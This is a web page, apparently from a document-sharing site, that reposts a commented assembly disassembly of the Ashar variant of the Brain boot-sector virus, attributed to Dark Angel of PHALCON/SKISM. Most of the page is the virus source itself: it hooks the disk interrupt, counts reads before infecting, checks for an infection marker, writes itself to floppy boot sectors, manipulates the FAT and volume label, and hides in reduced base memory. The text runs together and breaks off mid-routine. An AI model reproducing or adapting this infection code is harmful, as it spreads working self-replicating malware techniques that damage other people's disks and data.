Code virus brain

Code virus brain : ; This is the ashar variant of the classic Pakistani Brain virus. It is large ; by todays standards, although it was one of the first. It is a floppy only ; boot sector infector. brain segment byte public assume cs:brain, ds:brain ; Disassembly done by Dark Angel of PHALCON/SKISM org 0 cli jmp entervirus idbytes db 34h, 12h firsthead db 0 firstsector dw 2707h curhead db 0 cursector dw 1 db 0, 0, 0, 0 db Welcome to the Dungeon copyright db (c) 1986 Brain db 17h db & Amjads (pvt) Ltd VIRUS_SHOE ...
Nội dung trích xuất từ tài liệu:
Code virus brainCode virus brain :; This is the ashar variant of the classic Pakistani Brain virus. It is large; b y todays standards, although it was one of the first. It is a floppy only; boot sector infector.brain segment byte publicassume cs:brain, ds:brain; D isassembly done by Dark Angel of PHALCON/SKISMorg 0clijmp entervirusidbytes db 34h, 12hfirsthead db 0firstsector dw 2707hcurhead db 0cursector dw 1db 0, 0, 0, 0db Welcome to the Dungeon copyright db (c) 1986 Braindb 17hdb & Amjads (pvt) Ltd VIRUS_SHOE db RECORD v9.0 Dedicated to thdb e dynamic memories of millions odb f virii who are no longer with udb s today - Thanks GOODNESS!! db BEWARE OF THE er..VIRUS : \thdb is program is catching progdb ram follows after these messegesdb ..... $db #@%$db \@!! entervirus:mov ax,csmov ds,ax ; ds = 0mov ss,ax ; set stack to aftermov sp,0F000h ; virusstimov al,ds:[7C00h+offset firsthead]mov ds:[7C00h+offset curhead],almov cx,d s:[7C00h+offset firstsector]mov ds:[7C00h+offset cursector],cxcall calcnextmov cx,5 ; read five sectorsmov bx,7C00h+200h ; after end of virusloadnext:call readdiskcall calcnextadd bx,200hloop loadnextmov ax,word ptr ds:[413h] ; Base memory size in Kbsub ax,7 ; - 7 Kbmov word ptr ds:[413h],ax ; Insert as new valuemov cl,6shl ax,cl ; Convert to paragraphsmov es,axmov si,7C00h ; Copy from virus startmov di,0 ; to start of memorymov cx,1004h ; Copy 1004h bytescldrep movsbpush esmov ax,200hpush axretf ; return to old boot sectorreaddisk:push cxpush bxmov cx,4 ; Try 4 timestryread:push cxmov dh,ds:[7C00h+offset curhead]mov dl,0 ; Read sector from defaultmov cx,ds:[7C00h+offset cursector]mov ax,201h ; Disk to memory at es:bxint 13hjnc readOKmov ah,0 ; Reset diskint 13h ; (force read track 0)pop cxloop tryreadint 18h ; ROM basic on failurereadOK:pop cxpop bxpop cxretncalcnext:mov al,byte ptr ds:[7C00h+offset cursector]inc almov byte ptr ds:[7C00h+offset cursector],alcmp al,0Ahjne donecalcmov byte ptr ds:[7C00h+offset cursector],1mov al,ds:[7C00h+offset curhead]inc almov ds:[7C00h+offset curhead],alcmp al,2jne donecalcmov byte ptr ds:[7C00h+offset curhead],0inc byte ptr ds:[7C00h+offset cursector+1]donecalc:retn; the following is a collection of garbage bytesdb 00h, 00h, 00h, 00h, 32h,0E3hdb 23h, 4Dh, 59h,0F4h,0A1h, 82hdb 0BCh,0C3h, 12h, 00h, 7Eh, 12hdb 0CDh, 21h,0A2h, 3Ch, 5Fha_data dw 050Ch; Second part of the virus begins herejmp short entersecondpartdb (c) 1986 Brain & Amjads (pvt) Ltd ,0readcounter db 4 ; keep track of # readscurdrive db 0int13flag db 0entersecondpart:mov cs:readcounter,1Fhxor ax,axmov ds,ax ; ds -> interrupt tablemov ax,ds:[13h*4]mov ds:[6Dh*4],axmov ax,ds:[13h*4+2]mov ds:[6Dh*4+2],axmov ax,offset int13 ; 276hmov ds:[13h*4],axmov ax,csmov ds:[13h*4+2],axmov cx,4 ; 4 triesxor ax,axmov es,ax ; es -> interrupt tabletryreadbootsector:push cxmov dh,cs:firstheadmov dl,0mov cx,cs:firstsectormov ax,201h ; read from default diskmov bx,7C00hint 6Dh ; int 13hjnc readbootOKmov ah,0int 6Dh ; int 13hpop cxloop tryreadbootsectorint 18h ; ROM basic on failurereadbootOK: ; return control to; original boot sector;* jmp far ptr 0000:7C00hdb 0EAh, 00h, 7Ch, 00h, 00hnop ; MASM NOP!!!int13:sticmp ah,2 ; if not read request,jne doint13 ; do not go furthercmp dl,2 ; if after second floppy,ja doint13 ; do not go furthercmp ch,0 ; if not reading boot sector,jne regularread ; go handle as usualcmp dh,0 ; if boot sector,je readboot ; do I/\|> stuffregularread:dec cs:readcounter ; Infect after 4 readsjnz doint13 ; If counter still OK, dont; do anything elsejmp short readboot ; Otherwise, try to infectdoint13:jmp exitint13hreadboot:; FINISH THIS!mov cs:int13flag,0 ; clear flagmov cs:readcounter,4 ; reset counterpush axpush bxpush cxpush dxmov cs:curdrive,dlmov cx,4tryreadbootblock:push cxmov ah,0 ; Reset diskint 6Dhjc errorreadingbootblock ; Try againmov dh,0mov cx,1mov bx,offset readbuffer ; buffer @ 6BEhpush esmov ax,csmov es,axmov ax,201hint 6Dh ; Read boot sectorpop esjnc continuestuff ; continue if no errorerrorreadingbootblock:pop cxloop tryreadbootblockjmp short resetdisk ; too many failuresnopcontinuestuff:pop cx ; get system id in boot blockmov ax,word ptr cs:[offset readbuffer+4]cmp ax,1234h ; already infected?jne dodisk ; if not, infect itmov cs:int13flag,1 ; flag prev. infectionjmp short noresetdodisk:push dspush esmov ax,csmov ds,axmov es,axpush sicall writevirus ; infect the diskjc failme ; exit on failuremov cs:int13flag,2 ; flag successcall changeroot ; manipulate volume labelfailme:pop sipop espop dsjnc noreset ; dont reset on successresetdisk:mov ah,0 ; reset diskint 6Dh ; int 13hnoreset:pop dxpop cxpop bxpop axcmp cx,1jne exitint13hcmp dh,0jne exitint13hcmp cs:int13flag,1 ; already infected?jne wasntinfected ; if wasnt, go elsewheremov cx,word ptr cs:[offset readbuffer+7]mov dx,word ptr cs:[offset readbuffer+5]mov dl,cs:curdrive ; otherwise, read realjmp short exitint13h ; boot sectorwasntinfected:cmp cs:int13flag,2 ; successful infection?jne exitint13h ; if not, just do callmov cx,cs:firstsectormov dh,cs:firstheadexitint13h:int 6Dh ; int 13hretf 2db 15 dup (0)FATManip: ; returns al as error codejmp short delvedeepernopFATManipreadcounter dw 3db (c) 1986 Brain & Amjads (pvt) Ltddelvedeeper:call readFAT ; Get FAT ID bytemov ax,word ptr ds:[offset readbuffer]cmp ax,0FFFDh ; is it 360K disk?je is360Kdisk ; continue if somov al,3 ; al=3 == not good diskstc ; flag errorretn ; and exitis360Kdisk:mov cx,37hmov FATManipreadcounter,0 ; none found yetchecknextsector:call FATentry12bit ; get entry in FATcmp ax,0 ; unused?jne notunusedinc FATManipreadcounter ; one more found unusedcmp FATManipreadcounter,3 ; If need mor ...